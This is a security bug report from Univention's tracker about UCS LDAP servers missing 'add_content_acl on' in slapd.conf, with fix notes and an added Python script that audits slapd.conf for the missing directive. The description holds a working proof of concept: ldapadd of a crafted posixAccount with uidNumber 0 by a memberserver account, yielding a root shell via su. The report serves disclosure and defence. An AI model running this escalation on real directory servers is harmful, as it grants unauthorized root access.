Bug 41797

Summary: add add_content_acl on to slapd.conf
Product: UCS
Reporter: Florian Best <best>
Component: LDAP
Assignee: Florian Best <best>
Status: CLOSED FIXED
QA Contact: Arvid Requate <requate>
Severity: critical
Priority: P5
CC: damrose, gohmann, schwardt
Version: UCS 4.1
Keywords: interim-1
Target Milestone: UCS 4.2
Hardware: Other
OS: Linux
See Also: https://forge.univention.org/bugzilla/show_bug.cgi?id=41715
          https://forge.univention.org/bugzilla/show_bug.cgi?id=31305
          https://forge.univention.org/bugzilla/show_bug.cgi?id=44054
What kind of report is it?: Security Issue
What type of bug is this?: ---
Who will be affected by this bug?: ---
How will those affected feel about the bug?: ---
User Pain:
Enterprise Customer affected?:
School Customer affected?:
ISV affected?:
Waiting Support:
Flags outvoted (downgraded) after PO Review:
Ticket number:
Bug group (optional): Security
Max CVSS v3 score:
Bug Depends on: 49523, 49524, 41715, 41725, 44055, 49434, 49507
Bug Blocks: 41723, 41724

Description Florian Best univentionstaff 2016-07-15 09:51:55 CEST
The content of LDAP ACLs is only evaluated if the database entry in slapd.conf contains "add_content_acl on". Memberservers/DCs can create arbitrary objects in various positions otherwise.
As there are dependencies between UCS and UCS@school we release this part of Bug #41715 a little bit later.

+++ This bug was initially created as a clone of Bug #41715 +++

Preconditions: Having a memberserver/slave/master/backup or any object underneath cn=memberserver,cn=computers,$ldap_base / cn=dc,cn=computers,$ldap_base.

root@xen3:~# eval "$(ucr shell)"
root@xen3:~# udm container/cn create --set name=memberserver --position "cn=computers,$ldap_base"
Object created: cn=memberserver,cn=computers,dc=school,dc=local
root@xen3:~# eval "$(ucr shell)"; udm computers/memberserver create --set name=hacker --position="cn=memberserver,cn=computers,$ldap_base" --set password=univention
Object created: cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local

# now PWN it
$ cat posix_account.ldif
dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local
univentionAppID: foobar
objectClass: univentionApp
objectClass: posixAccount
uid: hacker
cn: hacker
uidNumber: 0
gidNumber: 0
homeDirectory: /root
loginShell: /bin/bash
userPassword:: e2NyeXB0fSQ2JEguMDVWRC9EdVBueUlvTkMkeUlKd1lCWk5XVTRma0NWOFNFMHFpUDd5REIzSVFXbkZQUjA4VWkuTUtjSFFCWnZ5N09JbVUyYXZiMjJHVFlHbHpCZzRGanR0TVlDVXo4RldTcDBKbC8=
$ ldapadd -D cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local -w univention < posix_account.ldif
adding new entry "univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local"
$ su hacker
Passwort: 
hacker@xen3:~# id
uid=0(hacker) gid=0(root) Gruppen=0(root)

Comment 1 Florian Best univentionstaff 2017-01-13 19:00:43 CET
r75785 | Changelog Bug #41797

univention-ldap (13.0.2-1):
r75784 | Bug #41797: add add_content_acl on configuration

Comment 2 Arvid Requate univentionstaff 2017-02-01 21:12:55 CET
Ok, I made the wording of the changelog entry a bit more verbose.

Relevant documentation from slapd.conf():
===============================================================================
add_content_acl:

Controls  whether  Add  operations  will  perform ACL checks on the content of the entry being added. [...]
===============================================================================

And slapd.access(5) says:
===============================================================================
Also if Add content ACL checking has been configured on the database [...], add (=a) will be required on all of the attributes being added.
===============================================================================
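As an added audit check, which is not part of this bug report and not Univention's own code, the following Python script parses a slapd.conf and reports every database stanza that lacks "add_content_acl on", i.e. the condition the bug describes. It treats a missing directive as off, which is the default documented in slapd.conf(5), and it handles comment lines and slapd.conf-style continuation lines (lines beginning with whitespace). The embedded configuration is constructed for illustration and is not taken from a real UCS system.

```python
"""Report slapd.conf database stanzas that do not enable add_content_acl."""
import sys
from dataclasses import dataclass
from typing import Iterator, List, Optional, Tuple

# Constructed sample (not a real Univention slapd.conf): the first database
# is configured correctly, the second omits the directive, the third turns it off.
SAMPLE_SLAPD_CONF = """\
include /etc/ldap/schema/core.schema
# global ACL with a continuation line, as slapd.conf allows
access to attrs=userPassword
    by self write
    by * auth

database mdb
suffix "dc=school,dc=local"
rootdn "cn=admin,dc=school,dc=local"
add_content_acl on
directory /var/lib/ldap

database mdb
suffix "cn=translog"
directory /var/lib/univention-ldap/translog

database config
add_content_acl off
"""


@dataclass
class DatabaseStanza:
    backend: str
    line: int                      # line number of the 'database' directive
    suffix: Optional[str] = None
    add_content_acl: bool = False  # slapd.conf(5): the default is off


def _logical_lines(text: str) -> Iterator[Tuple[int, str]]:
    """Yield (lineno, line), joining continuation lines and dropping comments."""
    current: Optional[Tuple[int, str]] = None
    for no, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0] in " \t" and current is not None:
            current = (current[0], current[1] + " " + raw.strip())
            continue
        if current is not None:
            yield current
        current = (no, raw.strip())
    if current is not None:
        yield current


def parse_slapd_conf(text: str) -> List[DatabaseStanza]:
    """Split the file into database stanzas; directives before the first 'database' are global."""
    stanzas: List[DatabaseStanza] = []
    current: Optional[DatabaseStanza] = None
    for no, line in _logical_lines(text):
        parts = line.split(None, 1)
        directive = parts[0].lower()
        args = parts[1].strip() if len(parts) > 1 else ""
        if directive == "database":
            current = DatabaseStanza(backend=args, line=no)
            stanzas.append(current)
        elif current is None:
            continue
        elif directive == "suffix":
            current.suffix = args.strip('"')
        elif directive == "add_content_acl":
            current.add_content_acl = args.lower() == "on"
    return stanzas


def databases_without_content_acl(text: str) -> List[DatabaseStanza]:
    """Return the stanzas whose Add operations will not be ACL-checked on entry content."""
    return [s for s in parse_slapd_conf(text) if not s.add_content_acl]


if __name__ == "__main__":
    # Audit a real file when given a path, otherwise the constructed sample.
    conf = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SLAPD_CONF
    missing = databases_without_content_acl(conf)
    for s in missing:
        print(f"line {s.line}: database {s.backend} (suffix {s.suffix!r}) lacks 'add_content_acl on'")
    sys.exit(1 if missing else 0)
```

Run it against /etc/ldap/slapd.conf on a directory server; a non-zero exit status means at least one database still accepts Add operations without content ACL checks, which is the state this bug was fixed by changing.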

Comment 3 Stefan Gohmann univentionstaff 2017-04-04 18:29:21 CEST
UCS 4.2 has been released:
 https://docs.software-univention.de/release-notes-4.2-0-en.html
 https://docs.software-univention.de/release-notes-4.2-0-de.html

If this error occurs again, please use "Clone This Bug".